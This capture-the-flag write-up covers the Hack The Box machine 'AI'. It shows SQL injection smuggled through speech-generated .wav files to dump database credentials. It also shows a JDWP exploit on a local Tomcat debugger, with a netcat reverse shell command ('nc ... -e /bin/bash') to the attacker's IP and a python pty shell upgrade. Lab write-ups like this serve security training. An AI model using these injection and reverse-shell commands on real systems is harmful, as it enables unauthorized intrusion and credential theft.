Back

ai

AI

The Basics

The first thing we should do is map the box’ IP address to the box’ name .htb in the /etc/hosts file. 10.10.10.163 ai.htb

Initial Scan

Next up we will run a all port NMAP scan nmap -sC -sV -p- 10.10.10.163. We get results back for 2 ports: 22 SSH open and 80 HTTP open.

Initial NMAP scan

Web Enumeration

Let’s take a look at port 80 and run a gobuster.

gobuster results

We quickly get some promising results. We’ll take a look at ai.php and intelligence.php. It looks like we have some upload functionality for .wav files. The AI will process the .wav files into a search query. Looking at the intelligence page, we can get an overview of some commands and their results after processing by the AI. The page also hints to Microsoft and a Male US voice model. After some googling I found a free Text-To-Speech service with a Male US voice model and an extended Speech-To-Text table.

ai

intelligence

Generating wav files to dump credentials from the MySQL database

The speech-to-text table contains output that strongly hints to SQL injection, like union, schema, comma, period, -- -. So let’s try to generate a .wav file and test this.

We generate single-quote.wav which contains “open single quote”, this should result in a single quote after processing by the AI.

sqli test

Next up let’s try dumping credentials. We generate username.wav and password.wav which contain:

open single quote union select         yusername from users comment database
open single quote union selectpassword from users comment database

To make sure the AI parses our commands correctly we have to play around with the speed, spacing and spelling.

username

password

We successfully extract a username and password.

User flag and enumeration

With our credentials, we can SSH into the user and grab the user flag. ssh al***@ai.htb.

user flag

For the next part we will do some heavy enumeration. We run the following scripts and go through the output to look for anything of interest:

Looking at the running processes output from linpeas.sh we can see -agentlib:jdwp is flagged with a 99% PE.

linpeas

Monitoring pspy64 we see some interesting output regarding /root/tomcat.sh which seems to be killing and restarting a Tomcat instance which spawns the same process which was flagged by linpeas.

pspy

If we take a look at the network connections and listeners with netstat -auntp we see localhost is listening on ports 8000, 8080, 8005 and 8009. From the previous output we know the Tomcat server is running on port 8000.

netstat

Exploiting JDWP to gain a root shell

The Java Debug Wire Protocol (JDWP) enables remote debugging of java applications with the Java Debugger (JDB). Googling for a JDWP exploit will find us a Github Repository with a JDWP exploitation script called jdwp-shellifier.py.

Because the default netcat binary on the box doesn’t support the -e flag, we will upload our own /usr/bin/nc to /tmp, we will also upload the jdwp-shellifier.py script. Before we run the script we will set up a listener with nc -lnvp 444. Now we can run the exploit:

./jdwp-shellifier.py -t 127.0.0.1 -p 8000 --break-on 'java.lang.String.indexOf' --cmd '/tmp/nc  10.10.14.XXX 444 -e /bin/bash'

jdwp exploit

We successfully get a connection back and can upgrade our shell using python:

python -c "import pty;pty.spawn('/bin/bash')"
export TERM=xterm

Now we can grab the root flag.

root flag